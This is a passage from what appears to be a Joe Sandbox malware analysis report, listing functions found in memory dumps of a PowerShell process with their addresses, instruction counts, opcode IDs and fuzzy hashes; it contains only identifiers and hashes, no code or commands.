                                        • Instruction Fuzzy Hash: C6F0B4363053646FD7108A7A9C449BBBFEDEFC9660704417AF944C3351CA70DC0087A0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0447DEA3 Relevance: .0, Instructions: 39COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 01ad9ca0acdc7a78b968fb14bf2a6df44e1b52a3c6cef9057ec2ba804b313058
                                        • Instruction ID: 3dfe145714468ef4d5076733948e3165c1028f5ad362c3dcab92899be7e80351
                                        • Opcode Fuzzy Hash: 01ad9ca0acdc7a78b968fb14bf2a6df44e1b52a3c6cef9057ec2ba804b313058
                                        • Instruction Fuzzy Hash: F1F0BE76B105149BCB149669E8015EEFBAADFC8231B00843BD51AEB750DB31A9478BE1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04477958 Relevance: .0, Instructions: 39COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dc567d2ec1fe4691735742e1d117609d4f2a82f52bfc01b9bf9d56e45b30abee
                                        • Instruction ID: 9880d95ea6657756d8d7210cc5ed23ae2db8e3d782504591c44eca7225522bf2
                                        • Opcode Fuzzy Hash: dc567d2ec1fe4691735742e1d117609d4f2a82f52bfc01b9bf9d56e45b30abee
                                        • Instruction Fuzzy Hash: 75F0C2312053545FCB528B79A8849AFBFF5EF89321B14056EE049D7652DA70AC868760
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0447BF30 Relevance: .0, Instructions: 38COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: aee9789324826a9bb8915aa10d40dbe63ccfc9ede6d68214cbc667fe1216751c
                                        • Instruction ID: 95a9ea50530d0401c054536f617442cb33fc5c871b7cc7549d56e079a66979f9
                                        • Opcode Fuzzy Hash: aee9789324826a9bb8915aa10d40dbe63ccfc9ede6d68214cbc667fe1216751c
                                        • Instruction Fuzzy Hash: 0EF0BE323093646FDB008A6A9C849BBBFEDEFC9620B04407AF944C3351CAB0DC0086A0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00E5D9A7 Relevance: .0, Instructions: 37COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704454571.0000000000E5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E5D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_e5d000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f50387ab6ca6dcfb65c6bcd66ebcbcb0f5a6553b50ee126d7fee8d12470295ee
                                        • Instruction ID: 77fe689d9f62d7a236cd5d909fc17bdf438b23a4ec062042403aa1f920714694
                                        • Opcode Fuzzy Hash: f50387ab6ca6dcfb65c6bcd66ebcbcb0f5a6553b50ee126d7fee8d12470295ee
                                        • Instruction Fuzzy Hash: D3F0F976204640AF97208F0ADD85C23FBADEBD4770719C56AEC4A9B711C671EC41CEA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04477EA1 Relevance: .0, Instructions: 36COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 060a4223b2351fa62a6a1315a87bd138eb46bd6fb60d91ae2819fffa7a3ae98c
                                        • Instruction ID: 93fddceaa045151511e48de00bddb71c96ca2f546b87f3f1aa2a0c39f7539e80
                                        • Opcode Fuzzy Hash: 060a4223b2351fa62a6a1315a87bd138eb46bd6fb60d91ae2819fffa7a3ae98c
                                        • Instruction Fuzzy Hash: 0FF0E9313403908FDB225B789954659FBB1EFC2314F00486ED2428FA91CF76A81D9741
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0447DE53 Relevance: .0, Instructions: 34COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4d094cc79d833a76b30823893f46d8d570ba6b6ef804aee216b2f7c0a538f6a6
                                        • Instruction ID: b8e8bb1c6bb190f0d88b1d8931565e3fe86be66ae438aaf539b659c103dd67f1
                                        • Opcode Fuzzy Hash: 4d094cc79d833a76b30823893f46d8d570ba6b6ef804aee216b2f7c0a538f6a6
                                        • Instruction Fuzzy Hash: 2CE02B76B5050457CF22566E78014DEF79ADFC42B2300443BE51DD3600DF64A90747D1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00E5D998 Relevance: .0, Instructions: 33COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704454571.0000000000E5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E5D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_e5d000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dcc25dbd14f1f13c990914b0e8824155a05f43145da5fd8c5e84c1188ef96b5e
                                        • Instruction ID: 943b8cdc02e7cd101327ae36eb88c347f386c18640e697bbc28a8c1b031c32cf
                                        • Opcode Fuzzy Hash: dcc25dbd14f1f13c990914b0e8824155a05f43145da5fd8c5e84c1188ef96b5e
                                        • Instruction Fuzzy Hash: 68F0F975104680AFD725CF06CD85D23BBB9EBC5734B198499A84A9B712C671FC42CF60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0447E003 Relevance: .0, Instructions: 33COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a598762475bf468dd0b14279c4eb22625638f974c8fdec28fb7ee902576e5e0c
                                        • Instruction ID: fe5873ca8a972dab561e483a38ff90b3df2b2dba698e9ce6f4b45b00dbc4a688
                                        • Opcode Fuzzy Hash: a598762475bf468dd0b14279c4eb22625638f974c8fdec28fb7ee902576e5e0c
                                        • Instruction Fuzzy Hash: C7F030353001518F87108B1DD498DA7BBFAAFCA625329009BE545DBB25DB61EC418790
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04479167 Relevance: .0, Instructions: 33COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 56f819a9fdb5e0fd262bcd0d74ec419fe2d97f3c3d68488d4980fb0d80084fd7
                                        • Instruction ID: b9224c34de4fdd243f8f2cf78f14719bdf0b3df88d386a85b45a6ce0a6c37e20
                                        • Opcode Fuzzy Hash: 56f819a9fdb5e0fd262bcd0d74ec419fe2d97f3c3d68488d4980fb0d80084fd7
                                        • Instruction Fuzzy Hash: 69F0E2719043048FD3108F74E8993DB7FE5EB01360F0004AAE54EC7281DB396D89CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04477968 Relevance: .0, Instructions: 33COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c4b98a71a5c87f80f92ea08228bf5558b7491f31fb5fffb85101fceb68ed0f1b
                                        • Instruction ID: 163d8eace5f56eb18eb794a9b4af592e2d20ed46af7e8603727b4821024ded0e
                                        • Opcode Fuzzy Hash: c4b98a71a5c87f80f92ea08228bf5558b7491f31fb5fffb85101fceb68ed0f1b
                                        • Instruction Fuzzy Hash: 89F0A7713007145FDB109A69E8449AFB7F9EF88361B00052DE50DD3351DF70AD8687A0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04477697 Relevance: .0, Instructions: 31COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5b6363a84d21dc9c4368461d1908f87c809a13cc853aa1cebc401feae2791602
                                        • Instruction ID: 377dc2e86a3094a61ca179682efbebc3b7447ca446227ab092f4834639ea371d
                                        • Opcode Fuzzy Hash: 5b6363a84d21dc9c4368461d1908f87c809a13cc853aa1cebc401feae2791602
                                        • Instruction Fuzzy Hash: 55F0A0793406048FCB00EB7C9940AAABBE2EFCC361741415AE909DB329DA30EC028B90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 044790F8 Relevance: .0, Instructions: 31COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9797f173c4bfaddbd11416f93185b9a8a1059a0efe70c3eb1efc4bf8aa6abd4a
                                        • Instruction ID: b786965315c16642f6f4f6ffa723ecec11d35c2449bc5b22aad5678e5d7e2e45
                                        • Opcode Fuzzy Hash: 9797f173c4bfaddbd11416f93185b9a8a1059a0efe70c3eb1efc4bf8aa6abd4a
                                        • Instruction Fuzzy Hash: 6FF027B16005085BE710AB75C0193AFB7E6DFC0368F20812AD919673C5CE3A2906C7D1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0447E008 Relevance: .0, Instructions: 30COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c3d4f080214dd31b55f912851451bec984d16daa9f034607411349e3e04450e4
                                        • Instruction ID: 61d91cac503963ecb2b6b1aaa0b63b15667c4e7223077b3591aaf152a42eb919
                                        • Opcode Fuzzy Hash: c3d4f080214dd31b55f912851451bec984d16daa9f034607411349e3e04450e4
                                        • Instruction Fuzzy Hash: 71E06D353001118F87008B1DD458C67B7EAEFCE72532900AAE545DB721CA71EC028B80
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0447DE4B Relevance: .0, Instructions: 29COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dfeabb81942756b2e04f704746b69ec8c27489698fec7c7b7202718169393da2
                                        • Instruction ID: d1a1b5304dc3e462fa3ef90caa33a86481f6efd7f40d7242dfccbdae52912319
                                        • Opcode Fuzzy Hash: dfeabb81942756b2e04f704746b69ec8c27489698fec7c7b7202718169393da2
                                        • Instruction Fuzzy Hash: A8E02235B181449BCB299669E8101E9FB76DFC9220F0480BBD809A7741DA212D0BC3E1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0447E8D7 Relevance: .0, Instructions: 29COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d17dc6d6725215f6b354bd20559620ff6ff030e780544ebb1f2502a48adad78a
                                        • Instruction ID: 9825327197eca0835373a0cd0b7c2776a6fb5a5aeeda1ad26916a09e33d03748
                                        • Opcode Fuzzy Hash: d17dc6d6725215f6b354bd20559620ff6ff030e780544ebb1f2502a48adad78a
                                        • Instruction Fuzzy Hash: 84E07D37B0031CA69F2405ADBC8A4DBBF6CC7C8220F400577EA00B3B00E962241A42E1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0447EA56 Relevance: .0, Instructions: 29COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f3bd50806a6893b76c8b977c3ec164d60c848aec196a9db4b09bd9bbaa15e9a6
                                        • Instruction ID: b5920fa89474085d5be8d26644a67bc564be5d8a5b30470a1452ee05a6f8cee4
                                        • Opcode Fuzzy Hash: f3bd50806a6893b76c8b977c3ec164d60c848aec196a9db4b09bd9bbaa15e9a6
                                        • Instruction Fuzzy Hash: 0FF0BD39A05204DFCB04CF98E589D9DBBB2FF48315B268181F90AAB321CB35AD81CB40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04478973 Relevance: .0, Instructions: 28COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ec56dbb95371eba768a8bce8041c39602b059a06bcbad0b425d1d2505849d4b5
                                        • Instruction ID: 4ca6d919c6a21a55249f0fdbdcd8076bb1f4fd1db1b6519bf6af2df128d9eff8
                                        • Opcode Fuzzy Hash: ec56dbb95371eba768a8bce8041c39602b059a06bcbad0b425d1d2505849d4b5
                                        • Instruction Fuzzy Hash: C6E0D836704A1457DB083775A81D3EE7B9AEBC4765F04002FEA0687341CF791E0243D9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0447955B Relevance: .0, Instructions: 27COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cc34abe53087da411ecf280fedbe5f11ff837db55e619973a2a918a71a2ad222
                                        • Instruction ID: 0f324461fad11e9e12abbbccf6da4181d3d107a4b00651e389096f20f6e2be72
                                        • Opcode Fuzzy Hash: cc34abe53087da411ecf280fedbe5f11ff837db55e619973a2a918a71a2ad222
                                        • Instruction Fuzzy Hash: 12D01277301525276D6475BB28446FBDBCF8BC55A5715113BDA04C7B42EC41EC0343E1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0447F618 Relevance: .0, Instructions: 25COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f7006c84ed874a9158b2792bb159c5f5df083865f27d65c55445f4b255fb71ff
                                        • Instruction ID: 19fc770d4bd6e521a8b603ed35635a806dc10ff7aa4e4f4a25809e819b753a96
                                        • Opcode Fuzzy Hash: f7006c84ed874a9158b2792bb159c5f5df083865f27d65c55445f4b255fb71ff
                                        • Instruction Fuzzy Hash: 84F065709042459FC741DFBDC88156ABFF0EF09200B1085EEC944DB211E3319902CBE1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04479178 Relevance: .0, Instructions: 25COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b9f34ea91d13d6a8605a60d02649d19c17a2e148000b56e91bf03019be6eac0b
                                        • Instruction ID: 210ff070859456b526134b28a0723bbf96b71c42a2e84ebc3a75bb497fae3eb7
                                        • Opcode Fuzzy Hash: b9f34ea91d13d6a8605a60d02649d19c17a2e148000b56e91bf03019be6eac0b
                                        • Instruction Fuzzy Hash: 7AF06D709007044BD760DF78D89D39ABBE9FB44350F00482AE55ED7380DB3969858B90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0447AFA3 Relevance: .0, Instructions: 24COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a9a29f97ed05faff7d26675c56534da683d8e30179b96ae61dfa2d7e34ec0584
                                        • Instruction ID: ff6df91fabd7a796d6fd36e16b0f2a2dcaf1995967fe8a456104ef0b023314e4
                                        • Opcode Fuzzy Hash: a9a29f97ed05faff7d26675c56534da683d8e30179b96ae61dfa2d7e34ec0584
                                        • Instruction Fuzzy Hash: 8AD02E23314125138F28903F78104EFAAAB82C2A30208803FF804DBB4AEC62E80703E0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04478978 Relevance: .0, Instructions: 24COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 579136db7945c6d4f315a358883eed0912ef6a56a241a2490724cb988f3f5da6
                                        • Instruction ID: 922e6b22c73e2e59e53c9633fb5716ec1e34a615d85f4872b0bab4ce093bc3ba
                                        • Opcode Fuzzy Hash: 579136db7945c6d4f315a358883eed0912ef6a56a241a2490724cb988f3f5da6
                                        • Instruction Fuzzy Hash: 0CE0DF31304A1447CB082775A81D3AE7B9AABC4769F00002AE60A87341CF781E0283D9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04479560 Relevance: .0, Instructions: 23COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8c7daf49c6977a5db8c45073a3ba160a1d9e6ed64ec114ccf059d77544bab280
                                        • Instruction ID: ea14979829a399f9e5161001655b770b7bf5e2b7ba55989f3e2a060972416f9a
                                        • Opcode Fuzzy Hash: 8c7daf49c6977a5db8c45073a3ba160a1d9e6ed64ec114ccf059d77544bab280
                                        • Instruction Fuzzy Hash: 7AD017A230152A172E6470AA28046FBDACF8BC45A5705013B9A08C7782EC41EC0343E1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0447DE58 Relevance: .0, Instructions: 23COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b7318f12303b40dbc0e0d7a7ed37949f6b2795282b295728e3e38d7e0df38876
                                        • Instruction ID: e06a34b7edc49e4754b2e7c386a11fce53820781986f71e2d88c9488a03633ad
                                        • Opcode Fuzzy Hash: b7318f12303b40dbc0e0d7a7ed37949f6b2795282b295728e3e38d7e0df38876
                                        • Instruction Fuzzy Hash: 62E0C271740A144B8712666EA81089FB7EEDFC46B2300842EE129D7350DF68ED0647D5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0447DEA8 Relevance: .0, Instructions: 23COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                        • Instruction ID: 76fbf817d2c2c49a5b53ebbf2b4bd6a1c58008a0ea5c7a6f8d8bc97911e3be3a
                                        • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                        • Instruction Fuzzy Hash: 9DE08C35B10018A7CB1896A9D8105E9FBAADFCC220F04807BD90AA7340EA32691786E1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04478807 Relevance: .0, Instructions: 22COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2c8364baa525964b44cf6b2f6efaf75cac1b122dedc20627ec5f717dcae688c0
                                        • Instruction ID: 399f22bdf2c39c00723433e333e665bb8678b69edcbe3e10514498782fe79931
                                        • Opcode Fuzzy Hash: 2c8364baa525964b44cf6b2f6efaf75cac1b122dedc20627ec5f717dcae688c0
                                        • Instruction Fuzzy Hash: 82E08635E042099BC724DF64E44B9EEBFB8E744301F004116EA0983B50EA305D41CBD1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04478743 Relevance: .0, Instructions: 19COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7b21e7b048a1eea8f7466b00c161f47bf823e70315db9a149b14a01d187cce55
                                        • Instruction ID: 2a4e053080941914244161e868fc03c3ff7bbcc3795001867d43ce54083b554a
                                        • Opcode Fuzzy Hash: 7b21e7b048a1eea8f7466b00c161f47bf823e70315db9a149b14a01d187cce55
                                        • Instruction Fuzzy Hash: 7CE012359082499BCB09AF75E81B6FDBF38FB00311F40019AE9075A5A1EE341A47CBC1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0447F628 Relevance: .0, Instructions: 16COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                        • Instruction ID: 9b21694478d7396bfb845ea63ee46c1f1558eae5e3ea4aac7c1a26f29997c250
                                        • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                        • Instruction Fuzzy Hash: 4BD04C70D042099F8780DFA9894556DFBF4EB48200B5085AA8919D7211E63156128BD1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04478748 Relevance: .0, Instructions: 15COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 97a6dbaf511570b7e749caf98ab427220f42eb4667a65c8f07996c41dbad5ae3
                                        • Instruction ID: 27648b31d34c9151260702a8fc292ace2dc5c220e545ea052b98d5767302ab10
                                        • Opcode Fuzzy Hash: 97a6dbaf511570b7e749caf98ab427220f42eb4667a65c8f07996c41dbad5ae3
                                        • Instruction Fuzzy Hash: 2BD067319045098BCB08ABA5E85B6BDBB78FA14311F404169E907561A0EA752A5BCAC5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04478810 Relevance: .0, Instructions: 15COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: eb35decdab36932f9c6e6f896b7876139ae476302b49f0c880726a7da0e810b4
                                        • Instruction ID: 4f04a205d73ff6a0ac30b939192da5beb65fffa9ef44854fa363519a5a086ed9
                                        • Opcode Fuzzy Hash: eb35decdab36932f9c6e6f896b7876139ae476302b49f0c880726a7da0e810b4
                                        • Instruction Fuzzy Hash: 8FD01234E0420A8BCB14EF64D44796DBBB4AB44300F004155D90597350EA305D01DBC1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04477933 Relevance: .0, Instructions: 15COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 193ef7eed2fbca3c2444037cc07d84a67405e63b2a872396ab21a712b7b621e2
                                        • Instruction ID: c27413445a80bcb7ec70351a9ac03b612d2dfba6228d31f1cbe51da05b42de14
                                        • Opcode Fuzzy Hash: 193ef7eed2fbca3c2444037cc07d84a67405e63b2a872396ab21a712b7b621e2
                                        • Instruction Fuzzy Hash: 5BD0C73504D3C64FC7075B7595544947FB1EE0726431605DED4868A1A3C67A8956CF01
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0447EB7F Relevance: .0, Instructions: 14COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
